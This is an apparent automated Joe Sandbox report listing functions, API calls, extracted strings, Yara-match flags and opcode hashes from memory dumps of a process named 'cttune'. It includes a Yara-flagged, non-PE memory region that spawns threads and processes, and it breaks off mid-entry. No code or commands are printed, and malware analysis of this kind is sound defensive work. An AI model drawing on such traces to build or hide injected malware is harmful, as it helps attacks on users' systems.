Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70375bad3d0b422a4dc9044be692811238ad2923202c70a2a3507042921350d5
Instruction ID: c3b754580bbb896c89c11942c34cba938c4a5bc841f757837ec56a1465c8399b
Opcode Fuzzy Hash: 70375bad3d0b422a4dc9044be692811238ad2923202c70a2a3507042921350d5
Instruction Fuzzy Hash: CC90027371140843D10071984444B4600158BE0301F95C016A1124654E8655C9517521

Function 05292C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292C7A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e20c1eb2015937b0ba6a230a1caec26d69c75740aebeb17f8cb902ba6a9cbe87
Instruction ID: dd92ac7c6b760acc58dd5c165821f35162d2d0d9c60f58bd7967d9187ca865fd
Opcode Fuzzy Hash: e20c1eb2015937b0ba6a230a1caec26d69c75740aebeb17f8cb902ba6a9cbe87
Instruction Fuzzy Hash: 1390027371148803D1107198844474A00158BD0301F99C411A5424658E86D589917121

Function 05292CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292CAA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e67250c5afd0ed0b7ff3967ceaf6e199e4c4195989658f0281fb4c16a6570bd6
Instruction ID: 72389c5518d4c5d3c0650031c44028314f8c7855a84a5304b9a0173f743b3820
Opcode Fuzzy Hash: e67250c5afd0ed0b7ff3967ceaf6e199e4c4195989658f0281fb4c16a6570bd6
Instruction Fuzzy Hash: EB90027371140403D10075D8544864600158BE0301F95D011A6024555FC6A589916131

Function 05292F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292F3A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27c727d00a200404d8fd8bf819881ee369947904ba26fe1cf6810e2a4e038440
Instruction ID: 26b2301ed75060a7263f98b5e105e522843ffb8ad7e5f4f575b30bb0736d3aca
Opcode Fuzzy Hash: 27c727d00a200404d8fd8bf819881ee369947904ba26fe1cf6810e2a4e038440
Instruction Fuzzy Hash: 849002A375140443D10071984454B060015CBE1301F95C015E2064554E8659CD526126

Function 05292FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292FBA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c78edab4fb6c333d0e65a8d9d9e419c7af476ca36e7b28c668e27b089d3ebf8e
Instruction ID: 7fafe30f986b974291198c25a0e44a806a27d40bc695f87fa4b10d99d14ffa36
Opcode Fuzzy Hash: c78edab4fb6c333d0e65a8d9d9e419c7af476ca36e7b28c668e27b089d3ebf8e
Instruction Fuzzy Hash: FF900263B1140043414071A888849064015AFE1311795C121A1998550E859989655665

Function 05292FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292FEA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 40c2c815815cde6c89d0a0aab245bf88cb60a60510752552db06520f83e93fb4
Instruction ID: b08bf1843644d19d57985c8687c82c015302ba913d11ed31dc50acd41de4770c
Opcode Fuzzy Hash: 40c2c815815cde6c89d0a0aab245bf88cb60a60510752552db06520f83e93fb4
Instruction Fuzzy Hash: A1900263721C0043D20075A84C54B0700158BD0303F95C115A1154554DC95589615521

Function 05292E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292E8A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4dac31669594d4fafb0a43203f01947f3b8ffb91ae0ef3976a311ece2a2484b
Instruction ID: 5cc95e719dcd4ab4b51edb9ad5c626638c396141927f79ddd0e73d161a1c304f
Opcode Fuzzy Hash: f4dac31669594d4fafb0a43203f01947f3b8ffb91ae0ef3976a311ece2a2484b
Instruction Fuzzy Hash: 4C900263B1140503D10171984444616001A8BD0341FD5C022A2024555FCA658A92A131

Function 05292EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292EEA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b5feadc247bcb51ae7c970b62facbb908983eba305999c15f561ad1d814de33
Instruction ID: c09eee09b826a3e26d85cc7a752af0ff1733623dfe794f58068ae2b28b28c42a
Opcode Fuzzy Hash: 2b5feadc247bcb51ae7c970b62facbb908983eba305999c15f561ad1d814de33
Instruction Fuzzy Hash: 769002A371180403D1407598484460700158BD0302F95C011A3064555F8A698D516135

Function 05292B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292B6A

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b651777083eec65b99150a4993149aebf0f42a2712e8451c42d9562db77562dd
Instruction ID: 98b36000f45a0b047e8a7b748430a2141ca9e7b6d2dc597a6e2e3b3d2c4122b0
Opcode Fuzzy Hash: b651777083eec65b99150a4993149aebf0f42a2712e8451c42d9562db77562dd
Instruction Fuzzy Hash: AD9002A371240003410571984454616401A8BE0301B95C021E2014590EC56589916125

Function 05292BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292BAA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48db90c7362880a693ac24df9fd31842578073874141f80fcb4fd5e03c31d55e
Instruction ID: 3c57b108cc2d68ac26b3fa9cc8f5a952d2cf647b327ca2e50b5d22151d53c458
Opcode Fuzzy Hash: 48db90c7362880a693ac24df9fd31842578073874141f80fcb4fd5e03c31d55e
Instruction Fuzzy Hash: 93900273B1540803D1507198445474600158BD0301F95C011A1024654E87958B5576A1

Function 05292BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292BEA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd242f51679b7bb80859cb0dd4f49ea48c13902296952a2520853b29663cbcd6
Instruction ID: 056b5b3143ba5673ce77a98cb90460f118d503b30e1d628d46fe46025e86f457
Opcode Fuzzy Hash: cd242f51679b7bb80859cb0dd4f49ea48c13902296952a2520853b29663cbcd6
Instruction Fuzzy Hash: 3690027371544843D14071984444A4600258BD0305F95C011A1064694E96658E55B661

Function 05292BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292BFA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74c8245ee3f3037ee60329c6bbd8e113e68640755636ddf3bfc98983a7f62b02
Instruction ID: b8b5c759bc1c8fac7073019edc1aa3e2755c31a06433427d8dc0badc366dc386
Opcode Fuzzy Hash: 74c8245ee3f3037ee60329c6bbd8e113e68640755636ddf3bfc98983a7f62b02
Instruction Fuzzy Hash: C290027371140803D1807198444464A00158BD1301FD5C015A1025654ECA558B5977A1

Function 05292AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292AFA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94e47af0816d1e7ee99250ed741c03e37f379328361c237ff2c8f183c9a7f191
Instruction ID: 2e1e6a69dcfc03a322223618b480c7008e69a2a9a0790452852e18fcbbbd07a8
Opcode Fuzzy Hash: 94e47af0816d1e7ee99250ed741c03e37f379328361c237ff2c8f183c9a7f191
Instruction Fuzzy Hash: E3900267731400030145B598064450B04559BD63513D5C015F2416590DC66189655321

Function 05292AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05292ADA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bd7b7141790f24836e81d8e14d646356044101c5172260d5080003344816fc1
Instruction ID: 6670eaa17fbc110016038c1bd3db99ffb4bf8907f2da70f9950a9af7c5c9db55
Opcode Fuzzy Hash: 9bd7b7141790f24836e81d8e14d646356044101c5172260d5080003344816fc1
Instruction Fuzzy Hash: F7900477731400030105F5DC07445070057CFD53513D5C031F3015550DD771CD715131

Function 052935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052935CA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eec3d75ae70cbd7e65dafbf2febcb7f81cd9e40be3fb1a5d63415c43a0c44e8c
Instruction ID: b1f0d928e549532ed7620f0305b93ac951d2fcc7b20e57f4143dc5aae8b889d8
Opcode Fuzzy Hash: eec3d75ae70cbd7e65dafbf2febcb7f81cd9e40be3fb1a5d63415c43a0c44e8c
Instruction Fuzzy Hash: 2D900273B1550403D1007198455470610158BD0301FA5C411A1424568E87D58A5165A2

Function 052939B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052939BA

Memory Dump Source

Source File: 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true

Associated: 0000000B.00000002.2979051418.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5220000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3372ee12d35162953bcc2968ad7ad441d532e719d87c1620e519bfae843a7f5
Instruction ID: 2b310e2265d13c0743725a99bfa2870961f52526a67ac779b926fe83232ecafe
Opcode Fuzzy Hash: e3372ee12d35162953bcc2968ad7ad441d532e719d87c1620e519bfae843a7f5
Instruction Fuzzy Hash: 3C90026375545103D150719C44446164015ABE0301F95C021A1814594E859589556221

Function 03239DE6 Relevance: 64.9, APIs: 1, Strings: 36, Instructions: 174
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239DD5

Strings

3, xrefs: 0323A008
(, xrefs: 0323A110
CH, xrefs: 0323A117
^D, xrefs: 03239FFE
], xrefs: 0323A0AF
S:, xrefs: 03239E61
7, xrefs: 0323A1E2
;Z, xrefs: 03239E57
`{, xrefs: 03239F5F
G0, xrefs: 03239F12
u, xrefs: 0323A03A
o , xrefs: 0323A109
PB, xrefs: 03239F1C
z, xrefs: 0323A073
M, xrefs: 0323A0A5
K^, xrefs: 0323A062
J[, xrefs: 03239F99
uV, xrefs: 0323A189
/, xrefs: 0323A07D
NM, xrefs: 03239F26
87, xrefs: 03239F08
I, xrefs: 0323A171
V, xrefs: 0323A155
CU, xrefs: 03239E2F
zX, xrefs: 03239FA7
d\, xrefs: 03239F92
3f, xrefs: 0323A17F
7, xrefs: 0323A16A
H, xrefs: 0323A026
cz, xrefs: 03239F69
uG, xrefs: 03239EC5
hY, xrefs: 03239FD6
t, xrefs: 0323A1C4
T, xrefs: 0323A1A6
'c, xrefs: 03239EA7
`, xrefs: 0323A13A

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: `$'c$/$3$3f$7$7$87$;Z$CH$CU$G0$H$I$J[$K^$M$NM$PB$S:$T$V$]$^D$`{$cz$d\$hY$o $t$u$uG$uV$z$zX$(
API String ID: 2422867632-2759518389
Opcode ID: 2808f62ed68ed8b6eb0ac44ae70336bdb2c80daeaf3eada904da8235f0373108
Instruction ID: 263190610953a303c55943fd38a2ee80c375d3fe0aa798cb1a3f137eac51f393
Opcode Fuzzy Hash: 2808f62ed68ed8b6eb0ac44ae70336bdb2c80daeaf3eada904da8235f0373108
Instruction Fuzzy Hash: 59B168B0C056689BEB61CF41CD98BCEBBB5BB41308F5085C8D5583B281C7FA1A89CF95

Function 03253C60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03253D3B

Strings

net.dll, xrefs: 03253CF7, 03253D86, 03253D66, 03253D72, 03253D92
wininet.dll, xrefs: 03253CCE, 03253CDA

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 77a6ef5de621deef47d6b3d9df9aded06e3c7665d00ce31998ac501a613751ac
Instruction ID: 1922efd5a81f5e7c795d8923a0ef2af8dcc5c78784abac4380675c6a814fdef2
Opcode Fuzzy Hash: 77a6ef5de621deef47d6b3d9df9aded06e3c7665d00ce31998ac501a613751ac
Instruction Fuzzy Hash: EB3180B5611705BBD714DF60CC80FEAB7B9FB84750F44851DFA196B240D7B06A81CBA4

Function 0324F729 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0324F747
CoUninitialize.COMBASE ref: 0324F82E

Strings

@J7<, xrefs: 0324F75B

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 97d2ebd5e9d3ea318f158fe53a5184d2dc1f492f02d70f539e5593e8ec5c201a
Instruction ID: e3f45fa9dddb5e2d076cbdc154c843d4c1aedfa1c1a93bf93720b3319a2c0156
Opcode Fuzzy Hash: 97d2ebd5e9d3ea318f158fe53a5184d2dc1f492f02d70f539e5593e8ec5c201a
Instruction Fuzzy Hash: CC314176A1020AAFDB14DFD8D8809EFB7B9FF88304F108559E905AB204D775EE458BA0

Function 0324F730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0324F747
CoUninitialize.COMBASE ref: 0324F82E

Strings

@J7<, xrefs: 0324F75B

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 0c534359f8d1820b8d8d3776f459812ab710eb20171a55e12e3e2cde257cdff4
Instruction ID: 96c9816689f6e95683b6a3bc1f55eae1e7af756c0d9279fc966e81efdfaab0af
Opcode Fuzzy Hash: 0c534359f8d1820b8d8d3776f459812ab710eb20171a55e12e3e2cde257cdff4
Instruction Fuzzy Hash: 58313276A1020AAFDB04DFD8D8809EFB7B9FF88304F108559E905EB214D775EE458BA0

Function 03244810 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03244882

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction ID: 7f8f472e607d79c50818ac3fe5cc5f4fca1f63a6947d18b7beb68a9e62c2efca
Opcode Fuzzy Hash: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction Fuzzy Hash: B30121B9D5020EABDF14EBE5EC41F9DB3B89B54208F044195FD089B241F671E794CB91

Function 03259A10 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,00000000,?,032485BE,00000010,?,?,?,00000044,?,00000010,032485BE,?,00000000,?), ref: 03259A70

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: b99a4a5aa213c43e4e724ddd4af610961b87da9c8540730c61e1aae46a735713
Instruction ID: 18a8403258bf34332553d35e38f4339553ff21bda14e38e4c5b94e30f725078a
Opcode Fuzzy Hash: b99a4a5aa213c43e4e724ddd4af610961b87da9c8540730c61e1aae46a735713
Instruction Fuzzy Hash: 3B01D6B2214108BBCB04DE99DC80EEB77ADEF8C714F408208BA09D7240D630F851CBA4

Function 03239D90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239DD5

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: f27095829c54fc8ab99ed63e258eea87ac6b3382ffe36d9f8717ed405277cd35
Instruction ID: 51cd73538e80234cf08102a4f9ddc9c44401a3851a52790efc6ebbad81c4c6cd
Opcode Fuzzy Hash: f27095829c54fc8ab99ed63e258eea87ac6b3382ffe36d9f8717ed405277cd35
Instruction Fuzzy Hash: 51F065B73A031436D720B5A99C02FD7B29CDB81A61F140029FB0CEF1C0D5E2B58182E8

Function 03239D8A Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239DD5

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9b9ab8b100bfc83089ac78af4b4adcc4cad82ce51cbc7896d2daf9de4f76e7ba
Instruction ID: e2aae04368d6da39720ae3e7edeef2759f17c757f02d9e1f0c0dc6c0b686efb9
Opcode Fuzzy Hash: 9b9ab8b100bfc83089ac78af4b4adcc4cad82ce51cbc7896d2daf9de4f76e7ba
Instruction Fuzzy Hash: CDF09BB73A030436E631B5599C02FEB629C8F81B51F14012DF708EF1D0D5E2B58283A8

Function 032410B2 Relevance: 1.5, APIs: 1, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 032410DD

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5d649709ee47c147a6ea2761ba86acbb42b3f7230ad0159c27ccc6b7925605f8
Instruction ID: 9287b2a45d2e23716f04ecf3c980568a5e16e918d340aa01260c20646dc59149
Opcode Fuzzy Hash: 5d649709ee47c147a6ea2761ba86acbb42b3f7230ad0159c27ccc6b7925605f8
Instruction Fuzzy Hash: 49E0D8B6A4014D35E726CD799D43BF97B1CD740640F000257EA95B1085E65069168A62

Function 03259930 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03241CE9,?,03255C9A,03241CE9,0325585E,03255C9A,?,03241CE9,0325585E,00001000,?,?,00000000), ref: 0325996C

Memory Dump Source

Source File: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3230000_cttune.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction ID: 4ad0314214334e06e7b0135946c54ea7264ead66c348ace6d09f9d26e2488a5c
